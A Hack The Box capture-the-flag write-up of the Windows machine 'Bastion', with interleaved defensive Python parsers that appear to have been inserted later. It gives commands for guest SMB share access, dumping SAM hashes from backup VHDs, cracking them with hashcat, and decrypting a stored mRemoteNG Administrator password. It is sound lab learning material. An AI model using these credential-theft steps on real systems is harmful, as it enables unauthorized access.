Hack The Box Write Up - Bastion
Hacker Orientation
Bastion was technically my second box on HTB, but it truly felt like my first.
OS: Windows
Difficulty: Easy
Points: 20
Release: 27 Apr 2019
IP: 10.10.10.134
Bastion was already pretty old by the time I started working on it, so the pressure to get root before it was retired kept me going 😈
I don’t have much of a background in Windows sysadmin work, but I was up for the challenge!
nmap:
# Nmap 7.80 scan initiated Fri Aug 30 17:38:43 2019 as: nmap -sV -o nmap_sv.out 10.10.10.134
Nmap scan report for 10.10.10.134
Host is up (0.11s latency).
Not shown: 996 closed ports
PORT    STATE SERVICE      VERSION
22/tcp  open  ssh          OpenSSH for_Windows_7.9 (protocol 2.0)
135/tcp open  msrpc        Microsoft Windows RPC
139/tcp open  netbios-ssn  Microsoft Windows netbios-ssn
445/tcp open  microsoft-ds Microsoft Windows Server 2008 R2 - 2012 microsoft-ds
Service Info: OSs: Windows, Windows Server 2008 R2 - 2012; CPE: cpe:/o:microsoft:windows
Service detection performed. Please report any incorrect results at https://nmap.org/submit/ .
# Nmap done at Fri Aug 30 17:38:52 2019 -- 1 IP address (1 host up) scanned in 8.63 seconds
Breaking it down
22 and 445 were the only ports I knew off the top of my head, and my SMB game was pretty weak.
Before even thinking about MSF and searchsploit, let’s kick off another scan, but with the default script flag (-sC).
This yielded some usable information about 445!
| account_used: guest
🤔
# Nmap 7.70 scan initiated Fri Aug 23 19:59:31 2019 as: nmap -sC -o nmap_sc.out 10.10.10.134
Nmap scan report for 10.10.10.134
Host is up (0.089s latency).
Not shown: 996 closed ports
PORT    STATE SERVICE
22/tcp  open  ssh
| ssh-hostkey:
|   2048 3a:56:ae:75:3c:78:0e:c8:56:4d:cb:1c:22:bf:45:8a (RSA)
|   256 cc:2e:56:ab:19:97:d5:bb:03:fb:82:cd:63:da:68:01 (ECDSA)
|_  256 93:5f:5d:aa:ca:9f:53:e7:f2:82:e6:64:a8:a3:a0:18 (ED25519)
135/tcp open  msrpc
139/tcp open  netbios-ssn
445/tcp open  microsoft-ds

Host script results:
|_clock-skew: mean: -39m24s, deviation: 1h09m15s, median: 33s
| smb-os-discovery:
|   OS: Windows Server 2016 Standard 14393 (Windows Server 2016 Standard 6.3)
|   Computer name: Bastion
|   NetBIOS computer name: BASTION\x00
|   Workgroup: WORKGROUP\x00
|_  System time: 2019-08-24T03:00:11+02:00
| smb-security-mode:
|   account_used: guest
|   authentication_level: user
|   challenge_response: supported
|_  message_signing: disabled (dangerous, but default)
| smb2-security-mode:
|   2.02:
|_    Message signing enabled but not required
| smb2-time:
|   date: 2019-08-23 20:00:12
|_  start_date: 2019-08-23 18:03:12
# Nmap done at Fri Aug 23 19:59:44 2019 -- 1 IP address (1 host up) scanned in 12.98 seconds
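Reading this by eye works for one host; across a whole subnet you would want the SMB findings pulled out programmatically. The following is an added example, not code from the write-up or from nmap: it parses the `|`-decorated NSE output above (the host script section is embedded as sample input) and turns the `smb-security-mode` and `smb2-security-mode` blocks into findings a defender can act on, since a guest session being accepted is what allows unauthenticated share enumeration and signing being disabled or optional is what allows SMB relay and tampering. The function names are mine.

```python
import re

# The 'Host script results' section of the nmap -sC scan above, used as sample input.
SCAN_OUTPUT = r"""
Host script results:
|_clock-skew: mean: -39m24s, deviation: 1h09m15s, median: 33s
| smb-os-discovery:
|   OS: Windows Server 2016 Standard 14393 (Windows Server 2016 Standard 6.3)
|   Computer name: Bastion
|   NetBIOS computer name: BASTION\x00
|   Workgroup: WORKGROUP\x00
|_  System time: 2019-08-24T03:00:11+02:00
| smb-security-mode:
|   account_used: guest
|   authentication_level: user
|   challenge_response: supported
|_  message_signing: disabled (dangerous, but default)
| smb2-security-mode:
|   2.02:
|_    Message signing enabled but not required
| smb2-time:
|   date: 2019-08-23 20:00:12
|_  start_date: 2019-08-23 18:03:12
"""


def parse_nse_scripts(text):
    """Group nmap's '|'-decorated NSE output into {script_name: [body lines]}.

    A script header sits directly after the pipe ('| smb-security-mode:');
    its body lines are indented further ('|   account_used: guest').
    """
    scripts = {}
    current = None
    for raw in text.splitlines():
        if not raw.startswith("|"):
            current = None                  # left the script output area
            continue
        body = raw[2:] if raw.startswith("|_") else raw[1:]
        indent = len(body) - len(body.lstrip(" "))
        stripped = body.strip()
        if indent <= 1:                     # new script block (one-liners carry a value too)
            name, _, rest = stripped.partition(":")
            current = name.strip()
            scripts[current] = [rest.strip()] if rest.strip() else []
        elif current is not None:
            scripts[current].append(stripped)
    return scripts


def smb_findings(scripts):
    """Turn the SMB security-mode blocks into defender-facing findings."""
    findings = []
    for line in scripts.get("smb-security-mode", []):
        key, _, value = (part.strip() for part in line.partition(":"))
        if key == "account_used" and value == "guest":
            findings.append("SMB: guest session accepted (shares enumerable without credentials)")
        elif key == "message_signing" and value.startswith("disabled"):
            findings.append("SMB1: message signing disabled (traffic can be relayed or tampered with)")
    for line in scripts.get("smb2-security-mode", []):
        if "not required" in line.lower():
            findings.append("SMB2: message signing enabled but not required")
    return findings


def smb_summary(text):
    """OS line from smb-os-discovery plus the list of findings."""
    scripts = parse_nse_scripts(text)
    os_line = next((l for l in scripts.get("smb-os-discovery", []) if l.startswith("OS:")), None)
    return {"os": os_line, "findings": smb_findings(scripts)}


if __name__ == "__main__":
    summary = smb_summary(SCAN_OUTPUT)
    print(summary["os"])
    for finding in summary["findings"]:
        print(" -", finding)
```

On Bastion all three findings fire, which is why `smbclient -L` works with no credentials at all. Run it over `nmap -sC -oN` output for a range and it reports the same three conditions host by host.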
So what do we do with that?
Hohoho, we can get to a few shares!
smbclient -L 10.10.10.134
Let’s connect!
smbclient -U guest //10.10.10.134/Backups
cd WindowsImageBackup\L4mpje-PC\Backup~1\
dir
What are these .vhd files?
They are apparently Virtual Hard Disks. Maybe they have some credentials we can use. But how are we going to view what’s inside?
According to the note in the directory, we shouldn’t even try to copy these .vhd files. The bandwidth just isn’t there.
Can we mount them? YES WE CAN!
mkdir /mnt/win /mnt/vhd3 /mnt/vhd4
mount -t cifs //10.10.10.134/Backups /mnt/win -o rw
guestmount --add /mnt/win/WindowsImageBackup/L4mpje-PC/Backup*/9b9cfbc3-369e-11e9-a17c-806e6f6e6963.vhd --inspector --ro /mnt/vhd3 -v
guestmount --add /mnt/win/WindowsImageBackup/L4mpje-PC/Backup*/9b9cfbc4-369e-11e9-a17c-806e6f6e6963.vhd --inspector --ro /mnt/vhd4 -v
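Before mounting (or, as the note on the share warns, copying) a multi-gigabyte .vhd, you can learn what it claims to be from its 512-byte footer alone. The following is an added example, not code from the write-up or from guestmount: it parses the VHD footer format (cookie `conectix`, format version, disk type, sizes, creation time, checksum) and, given a path, reads only the trailing 512 bytes, so it works over the CIFS mount without pulling the whole file. The sample footer it builds, its creator strings and UUID are constructed values, and its geometry calculation is simplified rather than the spec's full algorithm.

```python
import struct
import uuid
from datetime import datetime, timedelta, timezone

# VHD footer layout (big-endian, 512 bytes): cookie, features, format version,
# data offset, timestamp, creator app, creator version, creator host OS,
# original size, current size, geometry (cylinders, heads, sectors), disk type,
# checksum, unique id, saved state, reserved.
FOOTER_FMT = ">8sIIQI4sI4sQQHBBII16sB427s"
FOOTER_SIZE = struct.calcsize(FOOTER_FMT)               # 512
VHD_COOKIE = b"conectix"
VHD_EPOCH = datetime(2000, 1, 1, tzinfo=timezone.utc)   # VHD timestamps count seconds from here
FIXED_DATA_OFFSET = 0xFFFFFFFFFFFFFFFF                  # fixed disks carry no dynamic header
DISK_TYPES = {0: "none", 2: "fixed", 3: "dynamic", 4: "differencing"}


def vhd_checksum(footer):
    """Spec checksum: one's complement of the byte sum with the checksum field (offset 64) zeroed."""
    zeroed = footer[:64] + b"\x00" * 4 + footer[68:]
    return (~sum(zeroed)) & 0xFFFFFFFF


def parse_vhd_footer(footer):
    """Decode a 512-byte VHD footer into a dict; raises ValueError if it is not one."""
    if len(footer) != FOOTER_SIZE:
        raise ValueError("VHD footer must be exactly %d bytes" % FOOTER_SIZE)
    (cookie, _features, version, data_offset, timestamp, creator_app, _creator_ver,
     creator_os, original_size, current_size, cyl, heads, spt, disk_type,
     checksum, unique_id, saved_state, _reserved) = struct.unpack(FOOTER_FMT, footer)
    if cookie != VHD_COOKIE:
        raise ValueError("not a VHD footer: cookie %r" % cookie)
    return {
        "format_version": "%d.%d" % (version >> 16, version & 0xFFFF),
        "disk_type": DISK_TYPES.get(disk_type, "unknown(%d)" % disk_type),
        "has_dynamic_header": data_offset != FIXED_DATA_OFFSET,
        "current_size": current_size,
        "original_size": original_size,
        "created": VHD_EPOCH + timedelta(seconds=timestamp),
        "creator_app": creator_app.decode("ascii", "replace").strip(),
        "creator_os": creator_os.decode("ascii", "replace"),
        "geometry": (cyl, heads, spt),
        "uuid": str(uuid.UUID(bytes=unique_id)),
        "saved_state": bool(saved_state),
        "checksum_ok": checksum == vhd_checksum(footer),
    }


def read_vhd_footer(path):
    """Read just the trailing 512 bytes of a .vhd (cheap even over a mounted share)."""
    with open(path, "rb") as f:
        f.seek(-FOOTER_SIZE, 2)
        return f.read(FOOTER_SIZE)


def build_sample_footer(size_bytes, disk_type=2):
    """Construct a footer for a sample disk; test data, not taken from the Bastion backups."""
    timestamp = int((datetime(2019, 2, 22, tzinfo=timezone.utc) - VHD_EPOCH).total_seconds())
    sectors = size_bytes // 512
    cylinders = min(sectors // (16 * 63), 0xFFFF)       # simplified geometry
    fields = [VHD_COOKIE, 2, 0x00010000,
              FIXED_DATA_OFFSET if disk_type == 2 else 512,
              timestamp, b"win ", 0x000A0000, b"Wi2k",
              size_bytes, size_bytes, cylinders, 16, 63, disk_type,
              0,                                        # checksum placeholder, filled below
              uuid.UUID("0e2b3c4d-0000-4000-8000-000000000042").bytes, 0, b"\x00" * 427]
    fields[14] = vhd_checksum(struct.pack(FOOTER_FMT, *fields))
    return struct.pack(FOOTER_FMT, *fields)


if __name__ == "__main__":
    import sys
    footer = read_vhd_footer(sys.argv[1]) if len(sys.argv) > 1 else build_sample_footer(20 * 1024 ** 3)
    for key, value in parse_vhd_footer(footer).items():
        print("%-19s %s" % (key, value))
```

Run with the path of a .vhd under /mnt/win to see its type and size before deciding to mount it; a failed checksum or wrong cookie tells you the file is truncated or not a VHD at all, which is worth knowing before guestmount spends minutes inspecting it.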
They’re mounted. Now what?
Because of my inexperience with Windows sysadmin work, I had no idea what to do!
Googling around for Windows equivalents of /etc/passwd and /etc/shadow led me to C:\Windows\System32\config and a nifty tool called samdump2.
cd /mnt/vhd4/Windows/System32/config
samdump2 SYSTEM SAM > /root/hash.txt
Let’s get crackin’!
I’d like to note that I burned more time trying to figure out password cracking. See the ‘Snags’ section below for the lessons I learned.
After a lot of frustration and an equal amount of coffee, I started looking for online cracking tools. People out there have probably cracked this, and it should be a simple lookup in their database.
End of the day, we got the password right? 😅
🚨 DANGER 🚨
There are dangers to doing this with real credentials. Sending hashes to random websites means that the website now has that credential.
I do not recommend the use of online cracking tools for credentials that have even the slightest possibility of being used on a real system.
🚨 DANGER 🚨
Finally time for a shell! User flag isn’t far.
Use those creds to SSH as L4mpje, and we’re greeted with a Windows prompt!
Let’s get the user flag: type Desktop\user.txt
Moving onto root
So do I go back to C:\Windows\System32\config now that we’re on a live system? I definitely did, but was definitely blocked due to permissions.
Now what? I do know where games are installed, thanks to PC gaming!
Program Files
😎
Poking around there, I saw an interesting program: mRemoteNG. Research shows that it’s for remote desktop connections.
It doesn’t have a good reputation in the security world, and that sounds great from the offensive side. 😈
I wonder if there’s a metasploit module or exploit-db script I can use!
Finding the config
Configs live in /etc/, right? Oh wait, Windows. 🤦
Turns out they sometimes live in C:\Users\L4mpje\AppData\Roaming\
After reading the matrix and going cross-eyed from tons of config files, I stumbled upon one that looked promising: `C:\Users\L4mpje\AppData\Roaming\mRemoteNG\confCons.xml`
This yielded an Administrator password, but in a strange format..
<Node Name="DC" Type="Connection" Descr="" Icon="mRemoteNG" Panel="General" Id="500e7d58-662a-44d4-aff0-3a4f547a3fee" Username="Administrator" Domain="" Password="aEWNFV5uGcjUHF0uS17QTdT9kVqtKCPeoC0Nw5dmaPFjNQ2kt/zO5xDqE4HdVmHAowVRdC7emf7lWWA10dQKiw==" Hostname="127.0.0.1" Protocol="RDP"
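Finding every user profile where a connection manager has saved credentials is a useful audit on its own, with nothing decrypted. The following is an added example, not code from the write-up or from mRemoteNG: it walks a confCons.xml (the file lives at `%APPDATA%\mRemoteNG\confCons.xml` for each user, as found above) and lists the connection nodes that carry a non-empty `Password` attribute, with their folder path, target host, protocol and whether the username is a privileged one. The sample file, its wrapper element, the `FullFileEncryption` attribute check and all values are constructed or assumed; only the node layout follows the fragment above.

```python
import xml.etree.ElementTree as ET

# Constructed confCons.xml in the shape of the node shown above. The wrapper element,
# the container node and every value are placeholders, not Bastion's file.
SAMPLE_CONFCONS = """<?xml version="1.0" encoding="utf-8"?>
<mrng:Connections xmlns:mrng="http://mremoteng.org" Name="Connections" Export="false"
                  EncryptionEngine="AES" BlockCipherMode="GCM" KdfIterations="1000"
                  FullFileEncryption="false" Protected="PROTECTED_PLACEHOLDER" ConfVersion="2.6">
  <Node Name="DC" Type="Connection" Descr="" Icon="mRemoteNG" Panel="General"
        Id="00000000-0000-4000-8000-000000000001" Username="Administrator" Domain=""
        Password="BASE64_BLOB_PLACEHOLDER_1" Hostname="127.0.0.1" Protocol="RDP" />
  <Node Name="Servers" Type="Container" Expanded="true">
    <Node Name="web01" Type="Connection" Username="svc_web" Domain="CORP"
          Password="BASE64_BLOB_PLACEHOLDER_2" Hostname="10.0.0.5" Protocol="SSH2" />
    <Node Name="jump" Type="Connection" Username="" Domain="" Password=""
          Hostname="10.0.0.9" Protocol="RDP" />
  </Node>
</mrng:Connections>
"""

PRIVILEGED_NAMES = {"administrator", "admin", "root"}   # my own short list, extend as needed


def _root(xml_text):
    data = xml_text.encode("utf-8") if isinstance(xml_text, str) else xml_text
    return ET.fromstring(data)


def find_stored_credentials(xml_text):
    """Connection nodes with a saved password; nothing is decrypted, only inventoried."""
    root = _root(xml_text)
    parents = {child: parent for parent in root.iter() for child in parent}
    hits = []
    for node in root.iter("Node"):
        if node.get("Type") != "Connection" or not node.get("Password"):
            continue
        # Folder path: walk up through the enclosing Container nodes.
        path, parent = [], parents.get(node)
        while parent is not None and parent.tag == "Node":
            path.insert(0, parent.get("Name", "?"))
            parent = parents.get(parent)
        username = node.get("Username", "")
        hits.append({
            "path": "/".join(path + [node.get("Name", "?")]),
            "hostname": node.get("Hostname", ""),
            "protocol": node.get("Protocol", ""),
            "username": username,
            "domain": node.get("Domain", ""),
            "privileged": username.lower() in PRIVILEGED_NAMES,
        })
    return hits


def file_level_encryption(xml_text):
    """True only when the whole file is encrypted (assumed FullFileEncryption root attribute);
    otherwise every node attribute, host and username included, is readable as plain XML."""
    return _root(xml_text).get("FullFileEncryption", "false").lower() == "true"


if __name__ == "__main__":
    import sys
    text = open(sys.argv[1], "rb").read() if len(sys.argv) > 1 else SAMPLE_CONFCONS
    print("full-file encryption:", file_level_encryption(text))
    for hit in find_stored_credentials(text):
        flag = " [PRIVILEGED]" if hit["privileged"] else ""
        print("%-16s %-10s %-5s %s\\%s%s" % (hit["path"], hit["hostname"], hit["protocol"],
                                            hit["domain"], hit["username"], flag))
```

The point for a defender is the inventory: an Administrator RDP entry to 127.0.0.1 sitting in an unprivileged user's roaming profile is the finding, whether or not anyone ever runs a decryptor against the blob.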
Taking time to recall
Remember how mRemoteNG was not highly regarded in the security realm?
That probably means people have written tools to help with exploitation.
It turns out that haseebT made a script to decrypt that string!
python3 mremotedecrypt.py -s aEWNFV5uGcjUHF0uS17QTdT9kVqtKCPeoC0Nw5dmaPFjNQ2kt/zO5xDqE4HdVmHAowVRdC7emf7lWWA10dQKiw==
We’ve got an Administrator credential!
Last thing to do is SSH in and get that root flag: type Desktop\root.txt
Before concluding this writeup, what snags did I run into?
I had to install stuff on Kali for mounting
echo "deb http://http.kali.org/kali kali-rolling main contrib non-free" >> /etc/apt/sources.list
apt update
apt install libguestfs-tools
apt install cifs-utils
Cracking woes
After rooting, I couldn’t help but feel unfulfilled knowing that I didn’t crack the password on my own.
Here’s how to crack it locally:
hashcat -m1000 --force hash.txt /usr/share/wordlists/rockyou.txt
Lesson learned: the hash mode (-m) of what you’re trying to crack is pretty important, both for speed and accuracy. Also helps with sanity 😅
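samdump2's output (the hash.txt written earlier and fed to hashcat here) is in pwdump format, `user:rid:lmhash:nthash:::`, and knowing which column is which is exactly what picking the right hashcat mode comes down to. The following is an added example, not code from the write-up, samdump2 or hashcat: it parses that format, reports what a defender would want from a dumped SAM (blank passwords and legacy LM hashes on enabled accounts), and returns the hashes with the matching hashcat mode (1000 for NT, 3000 for LM). The sample dump is constructed; the two constants for the empty LM and NT hash are the real well-known values, every other hash is a placeholder.

```python
import re

EMPTY_LM = "aad3b435b51404eeaad3b435b51404ee"   # stored when no LM hash is kept (the modern default)
EMPTY_NT = "31d6cfe0d16ae931b73c59d7e0c089c0"   # NT hash of the empty password
HASHCAT_MODE = {"nt": 1000, "lm": 3000}          # hashcat: NTLM = 1000, LM = 3000

# Constructed sample in the pwdump format samdump2 prints (user:rid:lmhash:nthash:::).
# The non-empty hashes are made-up placeholders, not the real Bastion hashes.
SAMPLE_DUMP = """\
Administrator:500:aad3b435b51404eeaad3b435b51404ee:31d6cfe0d16ae931b73c59d7e0c089c0:::
*disabled* Guest:501:aad3b435b51404eeaad3b435b51404ee:31d6cfe0d16ae931b73c59d7e0c089c0:::
L4mpje:1001:aad3b435b51404eeaad3b435b51404ee:0123456789abcdef0123456789abcdef:::
legacy:1002:fedcba9876543210fedcba9876543210:0123456789abcdef0123456789abcdef:::
"""

LINE_RE = re.compile(
    r"^(?P<disabled>\*disabled\* )?(?P<user>[^:]+):(?P<rid>\d+):"
    r"(?P<lm>[0-9a-fA-F]{32}):(?P<nt>[0-9a-fA-F]{32}):::$"
)


def parse_pwdump(text):
    """Parse pwdump lines into dicts; a line that does not fit the format is an error, not skipped."""
    entries = []
    for lineno, line in enumerate(text.splitlines(), 1):
        line = line.strip()
        if not line:
            continue
        m = LINE_RE.match(line)
        if not m:
            raise ValueError("line %d is not pwdump format: %r" % (lineno, line))
        entries.append({
            "user": m["user"], "rid": int(m["rid"]),
            "lm": m["lm"].lower(), "nt": m["nt"].lower(),
            "disabled": m["disabled"] is not None,
        })
    return entries


def audit(entries):
    """Defender-facing findings: blank passwords and legacy LM hashes on enabled accounts."""
    findings = []
    for e in entries:
        if e["disabled"]:
            continue
        if e["nt"] == EMPTY_NT:
            findings.append((e["user"], "blank password"))
        if e["lm"] != EMPTY_LM:
            findings.append((e["user"], "LM hash stored (legacy, far weaker than NT)"))
    return findings


def hashcat_input(entries, kind="nt"):
    """(hashcat mode, one hash per line) for enabled accounts that actually have a password."""
    empty = EMPTY_NT if kind == "nt" else EMPTY_LM
    hashes = [e[kind] for e in entries if not e["disabled"] and e[kind] != empty]
    return HASHCAT_MODE[kind], hashes


if __name__ == "__main__":
    import sys
    text = open(sys.argv[1]).read() if len(sys.argv) > 1 else SAMPLE_DUMP
    entries = parse_pwdump(text)
    for user, problem in audit(entries):
        print("%-14s %s" % (user, problem))
    mode, hashes = hashcat_input(entries)
    print("hashcat -m %d  (%d hash(es))" % (mode, len(hashes)))
```

Feeding the NT column to `-m 1000` is what the hashcat line above does; passing the whole pwdump line to the wrong mode is the kind of mistake that costs the hours mentioned in this section. The audit half is the same file read the way a sysadmin would: which enabled accounts have no password, and which still carry an LM hash.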
Closing thoughts
As I mentioned at the top, Bastion truly felt like my first box.
I leaned on the forums for a few hints here and there, but this box forced me to learn a bunch about SMB and Windows.
Hats off to L4mpje for creating this excellent box!